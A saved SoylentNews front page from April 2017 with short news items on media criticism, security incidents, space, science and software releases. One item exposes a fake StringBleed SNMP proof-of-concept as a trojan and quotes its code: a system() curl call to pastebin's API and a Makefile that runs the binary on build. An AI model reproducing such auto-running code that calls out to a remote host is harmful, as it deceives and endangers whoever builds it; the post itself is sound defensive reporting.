Stories
Slash Boxes
Comments

SoylentNews is people

Log In

Log In

Create Account  |  Retrieve Password


Site News

Join our Folding@Home team:
Main F@H site
Our team page


Funding Goal
For period:
   2017-01-01 to 2017-06-30.
Base Goal: $3000.00
Progress So Far: $1449.53
48.3%
Stretch Goal: $2000.00
Progress So Far: $0.00
0%

Covers the period:
  2017-01-01 .. 2017-04-28
  (SPIDs: [586..643]) --martyb


Support us: Subscribe Here and buy SoylentNews Swag


We always have a place for talented people, visit the Get Involved section on the wiki to see how you can make SoylentNews better.

How many hours' sleep do you average every 24 hours?

  • Less than 5 hours
  • 5 <= hours < 6
  • 6 <= hours < 7
  • 7 <= hours < 8
  • 8 <= hours < 9
  • 9 <= hours < 10
  • 10 or more hours
  • Sleep is for wimps!

[ Results | Polls ]
Comments:47 | Votes:397

posted by martyb on Sunday April 30, @08:22PM   Printer-friendly
from the pleasure!=joy dept.

In 1985, Neil Postman observed an America imprisoned by its own need for amusement. He was, it turns out, extremely prescient.

[...] Many Americans get their news filtered through late-night comedy and their outrages filtered through Saturday Night Live. They—we—turn to memes to express both indignation and joy.

[...] Postman today is best remembered as a critic of television: That’s the medium he directly blamed, in Amusing Ourselves to Death, for what he termed Americans’ “vast descent into triviality,” and the technology he saw as both the cause and the outcome of a culture that privileged entertainment above all else. But Postman was a critic of more than TV alone. He mistrusted entertainment, not as a situation but as a political tool; he worried that Americans’ great capacity for distraction had compromised their ability to think, and to want, for themselves. He resented the tyranny of the lol. His great observation, and his great warning, was a newly relevant kind of bummer: There are dangers that can come with having too much fun.

In 1984, Americans took a look around at the world they had created for themselves and breathed a collective sigh of relief. The year George Orwell had appointed as the locus of his dark and only lightly fictionalized predictions—war, governmental manipulation, surveillance not just of actions, but of thoughts themselves—had brought with it, in reality, only the gentlest of dystopias. Sure, there was corporatism. Sure, there was communism. And yet, for most of the Americans living through that heady decade, 1984 had not, for all practical purposes, become Nineteen Eighty-Four. They surveyed themselves, and they congratulated themselves: They had escaped.

Or perhaps they hadn’t. Postman opened Amusing Ourselves to Death with a nod to the year that had preceded it. He talked about the freedoms enjoyed by the Americans of 1984—cultural, commercial, political. And then he broke the bad news: They’d been measuring themselves according to the wrong dystopia. It wasn’t Nineteen Eighty-Four that had the most to say about the America of the 1980s, but rather Aldous Huxley’s Brave New World. “In Huxley’s vision,” Postman noted, “no Big Brother is required to deprive people of their autonomy, maturity, and history.” Instead: “People will come to love their oppression, to adore the technologies that undo their capacities to think.”

The vehicle of their oppression, in this case? Yep, the television. Which had, Postman argued, thoroughly insinuated itself on all elements of American life—and not just in the boob-tubed, couch-potatoed, the-average-American-watches-five-hours-of-television-a-day kind of way that is so familiar in anti-TV invectives, but in a way that was decidedly more intimate.

https://www.theatlantic.com/entertainment/archive/2017/04/are-we-having-too-much-fun/523143/

Are we having tooooo much fun ?


Original Submission

posted by martyb on Sunday April 30, @06:37PM   Printer-friendly
from the horrect-borse-stattery-caple dept.

Think passwords, people. Think long, complex passwords. Not because a breach dump's landed, but because the security-probing-oriented Kali Linux just got better at cracking passwords.

Kali is a Debian-based Linux that packs in numerous hacking and forensics tools. It's well-regarded among white hat hackers and investigators, who appreciate its inclusion of the tools of their trades.

The developers behind the distro this week gave it a polish, adding new images optimised for GPU-using instances in Azure and Amazon Web Services. The extra grunt the GPUs afford, Kali's backers say, will enhance the distribution's password-probing powers. There's also better supoprt for GPU cracking, hence our warning at the top of this story: anyone can use Kali and there's no way to guarantee black hats won't press it into service. And they can now do so on as many GPU-boosted cloud instances as they fancy paying for.

Could some users of Kali Linux technically be called "thugs?"


Original Submission

posted by martyb on Sunday April 30, @04:52PM   Printer-friendly
from the pay-up-or-else dept.

DataBreaches.net notes:

"On December 26, in an encrypted chat, TheDarkOverlord (TDO) informed DataBreaches.net that they had recently come across what they described as hundreds of GBs of unreleased and non-public media from a studio located in Hollywood...TDO would not reveal the attack method nor how much the ransom demand was, but DataBreaches.net was able to obtain a copy of a contract both TDO and a representative of Larson allegedly signed. The contract, signed December 27, indicated that the studio would pay TDO 50 BTC by January 31. TDO signed the contract as "Adolf Hitler." The signature of the company representative was indecipherable, but TDO claimed that it was the CFO of the firm who signed. "

https://www.databreaches.net/thedarkoverlord-leaks-upcoming-episode-of-orange-is-the-new-black-after-netflix-doesnt-pay-extortion-demand/

According to http://www.coindesk.com/price/ 50 BTC is US $65,984.32

This article contains more of the contract content: https://noise.getoto.net/tag/thedarkoverlord/ as well as links to the pastebin (removed) https://web.archive.org/web/20170428224235/https://pastebin.com/FKZAafQd.

And covered by TorrentFreak https://torrentfreak.com/hackers-leak-netflixs-orange-is-the-new-black-season-5-premiere-170429/


Original Submission

posted by martyb on Sunday April 30, @03:07PM   Printer-friendly
from the we-can-find-no-longer-find-data-against-our-plans dept.

You were warned. Now it begins: The Chicago Tribune reports that the U.S. Environmental Protection Agency (EPA) is working on changes to its Web properties:

The EPA's extensive climate change website now redirects to a page that says "this page is being updated" and that "we are currently updating our website to reflect EPA's priorities under the leadership of President Trump and Administrator Pruitt." It also links to a full archive of how the page used to look on Jan. 19, before Trump's inauguration.


Original Submission

posted by martyb on Sunday April 30, @01:22PM   Printer-friendly
from the Ask-Soylent dept.

Recently, someone in my family was not able to get into their home PC with their password, and called for assistance. This means having to drive down to the machine to see what they are doing, and log in with the appropriate account that can reset that password. Work commitments preclude driving there right away to see what is happening, and I am trying to locate a remote access solution. If they were logged into the machine, I could use some sort of remote assistance tool, but that is not an option in this case. There is the possibility of setting up SSH or OpenVPN to access the machine via the Internet, but I am not certain leaving those tools running all the time is the smartest idea in this day and age.

What recommendations do the Soylent community have for securely managing a machine over the Internet when someone is not logged into it?


Original Submission

posted by martyb on Sunday April 30, @11:37AM   Printer-friendly
from the quis-custodiet-ipsos-custodes? dept.

In a Security Week article by Ionut Arghir about a newly discovered SNMP vulnerability which allows authentication mechanisms to be bypassed on dozens of network device models (more detail here and here), the author included a link to a github repository (https://github.com/string-bleed/StringBleed-CVE-2017-5135 -- Don't compile and execute the code, but by all means take a look) which purports to be a proof-of-concept (POC) exploit of the vulnerability. However, it's not. It's a trojan which will exfiltrate data from your system.

From the Security Week article:

The issue, the researchers say [this is the link to the trojaned "POC"], resides in the manner in which the SNMP agent in different devices (usually cable modems) handles a human-readable string datatype value called "community string" that SNMP version 1 and 2 use.

The folks at Mitre (who manage the CVE database) caught this and make mention of the issue in their DB entry:

Certain Technicolor devices have an SNMP access-control bypass, possibly involving an ISP customization in some cases. The Technicolor (formerly Cisco) DPC3928SL with firmware D3928SL-P15-13-A386-c3420r55105-160127a could be reached by any SNMP community string from the Internet; also, you can write in the MIB because it provides write properties, aka Stringbleed. NOTE: the string-bleed/StringBleed-CVE-2017-5135 GitHub repository is not a valid reference as of 2017-04-27; it contains Trojan horse code purported to exploit this vulnerability.

The github repository contains a license, a readme, a Makefile and one source file, poc-linux.c. Looking at the C code, it's immediately clear that this is *not* an SNMP exploit (extracts from poc-linux.c):

void make_http_body()
{
        system("curl -X POST https://pastebin.com/api/api_post.php --data 'api_option=paste&api_paste_name=dotslashhacker&api_paste_expire_date=10M&api_paste_format=c&api_paste_private=0&api_dev_key=8fc2bb602e03acd0c45830805b878497&api_paste_code=i%20randomly%20run%20PoC%20exploits%20without%20checking%20them%20first%20'");

        printf("\n\n:)\n\n");
}

int make_packet(char *_packet, char *_fname, int *_body_len)
{

int header_len;
int packet_len;
char *body_line = calloc(sizeof(char), DATA_SIZE);
char *header_line = calloc(sizeof(char), DATA_SIZE);
make_http_body();
return 123;
}

[...]

int main(int argc, char* argv[])
{
  int i;
        int packet_len;
  int sock;
  int body_len;
  char *packet = calloc(sizeof(char), DATA_SIZE);

  char *f_name = '/etc/snmp';
  sock = socket_connect("104.20.209.21", 80);
  packet_len = make_packet(packet,f_name, &body_len);
  return 0;
}

What's more, the Makefile executes the binary immediately upon compiling/linking:


all: poclinux

poclinux:
        gcc -Qunused-arguments -std=gnu99 poc-linux.c -o poc-linux
        chmod +x poc-linux && ./poc-linux

I'm wondering why Mr. Arghir over at Security Week didn't do his due diligence (and it didn't take much, just opening the C file, or even just looking at the CVE entry at Mitre.org.

I know it goes against much of what Soylentils stand for, but TFA is a short read. Based on TFA, would any of you have simply gone to github and built this "POC" without making sure it was what it purported to be?

Also, is anyone actually still using SNMP v1/2/2c, rather than v3?


Original Submission

posted by charon on Sunday April 30, @09:41AM   Printer-friendly
from the crossing-my-fingers-against-Auteur-Existence-Failure dept.

Who asked for a bunch of "Avatar" sequels for Christmas? Your wish has been granted.

Better find out what the Na'vi want for Christmas, because the blue humanoids are going to be around for a lot of them.

The official Facebook page for James Cameron's sci-fi movie franchise announced on Saturday that dates have been set for the release of the next four "Avatar" sequels, and they're all right around the big December holiday movie rush, though in different years.

"Avatar takes flight as we begin concurrent production on four sequels," the post reads. "The journey continues December 18, 2020, December 17, 2021, December 20, 2024 and December 19, 2025!"

-- submitted from IRC


Original Submission

posted by charon on Sunday April 30, @07:47AM   Printer-friendly
from the still-pretty-loud dept.

http://www.npr.org/sections/thetwo-way/2017/04/26/525609671/recordings-reveal-baby-humpback-whales-whisper-to-their-mothers

Baby humpback whales seem to whisper to their mothers, according to scientists who have captured the infant whales' quiet grunts and squeaks.

The recordings, described in the journal Functional Ecology, are the first ever made with devices attached directly to the calves.

High suckling rates and acoustic crypsis of humpback whale neonates maximise potential for mother–calf energy transfer (open, DOI: 10.1111/1365-2435.12871) (DX)


Original Submission

posted by martyb on Sunday April 30, @05:48AM   Printer-friendly

SpaceX will attempt to launch a spy satellite for the first time on Sunday, breaking a 10-year United Launch Alliance monopoly on classified U.S. launches.

The two-hour launch window opens at 7:00 a.m. EDT (11:00 UTC), with a backup launch window the next day at the same time. SpaceX will attempt to recover the first stage rocket.

Also at NASASpaceFlight and The Verge. Falcon Heavy test firing begins soon.

[UPDATE 1: The launch is being live-streamed on YouTube. --martyb]

[UPDATE 2: Launch was scrubbed at T minus 1 minute due to "a sensor issue on the first stage" — launch now scheduled for same time tomorrow: Monday, May 1, 2017 at 0700 EDT / 1100 UTC. --martyb]


Original Submission

posted by charon on Sunday April 30, @04:18AM   Printer-friendly
from the or-not dept.

Submitted via IRC for TheMightyBuzzard

With slick marketing, catchy taglines and some pretty bold claims about their security, nomx claim to have cracked email security.

This thorough article tells all about the device, and it doesn't measure up at all to its marketing.

It would be very easy to conclude that this is a scam. The device is running standard mail server software running on a Raspberry Pi, most of which is outdated. They have presented at countless tech shows and can be constantly found making bold statements of 'absolute security' yet didn't pick up a CSRF vulnerability in their web interface.

Source: https://scotthelme.co.uk/nomx-the-worlds-most-secure-communications-protocol/

Nomx has issued a reply on their main page in a post titled 'nomx Passes Security Tests After Blogger Claims to Have Penetrated nomx'. In that reply nomx states the following results:

No nomx user was affected by this threat. No nomx user could be affected by this threat in the future. No nomx data was compromised, and the blogger has (finally) reluctantly verified this. He still has not publicly shared these statements, except via an email response to the BBC when directly asked on April 25 the response was:

From the BBC to nomx: "I understand from your replies that you state categorically that no nomx accounts have been affected by this hack. I have put your questions to [blogger] who has confirmed to me that he cannot say that any have."

While nomx is no longer based on Raspberry devices, we still maintain that the users' data is secured as we've demonstrated to the blogger, the media and our customers.

Also at Ars Technica


Original Submission #1  Original Submission #2

posted by cmn32480 on Sunday April 30, @02:19AM   Printer-friendly
from the there-is-a-backlog dept.

It's reported that, as of 11 April, patches are available for a security bug in Microsoft Office and in Wordpad which was disclosed to the company in October. The flaw was widely exploited after McAfee blogged about it. It affects Microsoft Office 2007 SP3 and Windows Vista SP2; the latter was released in May 2009 and the former in October 2011.

In related news, The Register (nonCloud-flare link) says that

[...] CVE-2017-0210 in Internet Explorer, and CVE-2017-2605 in Office – are being actively attacked in the wild by miscreants and the Dridex malware. That latter bug has no patch, by the way: Microsoft just switched off an exploited PostScript filter by default.

further information: CVE-2017-0199

coverage:

related story:
After Microsoft Delays Patch Tuesday, Google Discloses Windows Bug


Original Submission

posted by cmn32480 on Sunday April 30, @12:41AM   Printer-friendly
from the does-he-have-a-wingman? dept.

An extremely cold and relatively small exoplanet has been discovered using gravitational microlensing. The planet orbits an ultracool red or brown dwarf at a distance of around 1.16 AU:

Scientists have discovered a new planet with the mass of Earth, orbiting its star at the same distance that we orbit our sun. The planet is likely far too cold to be habitable for life as we know it, however, because its star is so faint. But the discovery adds to scientists' understanding of the types of planetary systems that exist beyond our own.

[...] The newly discovered planet, called OGLE-2016-BLG-1195Lb, aids scientists in their quest to figure out the distribution of planets in our galaxy. An open question is whether there is a difference in the frequency of planets in the Milky Way's central bulge compared to its disk, the pancake-like region surrounding the bulge. OGLE-2016-BLG-1195Lb is located in the disk, as are two planets previously detected through microlensing by NASA's Spitzer Space Telescope.

Popsci press couldn't resist calling it "Hoth", although it would be even less hospitable.

Also at CNN and Scientific American (Space.com).

An Earth-mass Planet in a 1 au Orbit around an Ultracool Dwarf (open, DOI: 10.3847/2041-8213/aa6d09) (DX)


Original Submission

posted by takyon on Saturday April 29, @11:14PM   Printer-friendly
from the flatlander-handheld dept.

Kotaku reports that:

[...] Nintendo announced the New 2DS XL, a sleek $150 piece of hardware that is essentially a New 3DS XL without 3D. This is an iteration on 2013's 2DS, a cheaper model that also ditched the 3D but felt uncomfortable and lacked the convenient clamshell design of other models.

The new model is planned to be available in July in the United States, at around $150.

takyon: Is glasses-free 3D dead?

Nintendo 3DS was released in Japan on February 26, 2011 and worldwide the following month. The price was cut by $80 on July 28, 2011.


Original Submission

posted by martyb on Saturday April 29, @09:38PM   Printer-friendly
from the download-it-now dept.

Softpedia News reports that version 2.02 of the GRUB boot loader has been released. Among the many new features are support for LZ4 compression on ZFS, 64-bit ext2, XFS v5, Morse code output and a modem-like output through the PC speaker, Xen paravirtualisation, TrueCrypt ISOs, Apple fat binaries on non-Apple hardware, and 16-bit mode on non-x86 hardware.

Further information:
NEWS file

Related stories:
Windows 8 Update Erases Grub, Enables Secure Boot
Press Backspace 28 times: Pwn Unlucky Linux Systems Running GRUB


Original Submission

posted by martyb on Saturday April 29, @08:05PM   Printer-friendly
from the do-no-harm dept.

http://www.sciencemag.org/news/2017/04/10-million-settlement-over-alleged-misconduct-boston-heart-stem-cell-lab

A research misconduct investigation of a prominent stem cell lab by the Harvard University–affiliated Brigham and Women's Hospital (BWH) in Boston has led to a massive settlement with the U.S. government over allegations of fraudulently obtained federal grants. As Retraction Watch reports, BWH and its parent health care system have agreed to pay $10 million to resolve allegations that former BWH cardiac stem cell scientist Piero Anversa and former lab members Annarosa Leri and Jan Kajstura relied on manipulated and fabricated data in grant applications submitted to the U.S. National Institutes of Health (NIH).

A statement from the U.S. Attorney's Office for the District of Massachusetts released today notes that it was BWH itself that shared the allegations against Anversa's lab with the government. The hospital had been conducting its own probe into the Anversa lab since at least 2014, when a retraction published in the journal Circulation revealed the ongoing investigation. The hospital has not yet released any findings.


Original Submission